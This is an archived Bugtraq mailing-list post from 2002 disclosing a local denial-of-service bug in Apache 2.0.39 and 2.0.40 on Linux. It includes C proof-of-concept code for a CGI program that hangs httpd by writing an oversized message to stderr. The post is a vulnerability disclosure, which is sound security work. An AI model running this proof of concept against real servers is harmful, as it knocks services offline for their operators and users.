Bugtraq mailing list archives

Apache 2.0.(39|40) DOS (PHP!)

From: shaddup () hush com
Date: 2002年9月23日 12:33:04 -0700

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -=~=-_-=~=-_-=~=-
I put PHP in the title so I know this message will reach the "sekur1ty c0mmun1ty", that *knows* that PHP is bad, 
because it's easy to write insecure applications, unlike C.
- -=~=-_-=~=-_-=~=-
Problem:
 o Apache 2.0 (.39 and .40 tested) on Linuxx0r (and possibly other OS's)
 will hang on a write to stderr that is larger than the default buffer
 size (4k on Linux)
Impact:
 o Local users can cause apache's httpd process to hang
 o Possible new DoS to look for in web apps that write
 user input to stderr!
Tested on:
 o Linux (RedHat)
 o FreeBSD (did not show a problem, but not well tested)
Notification:
 o The Apache Projekt was contacted July 9th, 2002
 (http://nagoya.apache.org/bugzilla/show_bug.cgi?id=10515)
- -=~=-_-=~=-_-=~=-
Sample Code
- -=~=-_-=~=-_-=~=-
// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>
#define SIZE 4075
void out_err()
{
 char buffer[SIZE];
 int i = 0;
 for (i = 0; i < SIZE - 1; ++i)
 buffer[i] = 'a' + (char )(i % 26);
 buffer[SIZE - 1] = '0円';
//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);
 fprintf(stderr, "short test\n");
 fflush(stderr);
 fprintf(stderr, "test error=%s\n", buffer);
 fflush(stderr);
} // out_err()
int main(int argc, char ** argv)
{
 fprintf(stdout, "Context-Type: text/html\r\n");
 fprintf(stdout, "\r\n\r\n");
 out_err();
 fprintf(stdout, "<HTML>\n");
 fprintf(stdout, "<body>\n");
 fprintf(stdout, "<h1>hello world</h1>\n");
 fprintf(stdout, "</body>\n");
 fprintf(stdout, "</HTML>\n");
 fflush(stdout);
 exit(0);
} // main()
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.1
Note: This signature can be verified at https://www.hushtools.com
wlgEARECABgFAj2Pa0MRHHNoYWRkdXBAaHVzaC5jb20ACgkQ8iAl114OGrxaHwCgsmGs
262aOmBHEUw01ktoAADRIz0AoJOdidtdbVswjjp0sqn1uHW+EQCT
=8PKT
-----END PGP SIGNATURE-----
Get your free encrypted email at https://www.hushmail.com

Previous By Date Next

Previous By Thread Next

Current thread:

Apache 2.0.(39|40) DOS (PHP!) shaddup (Sep 24)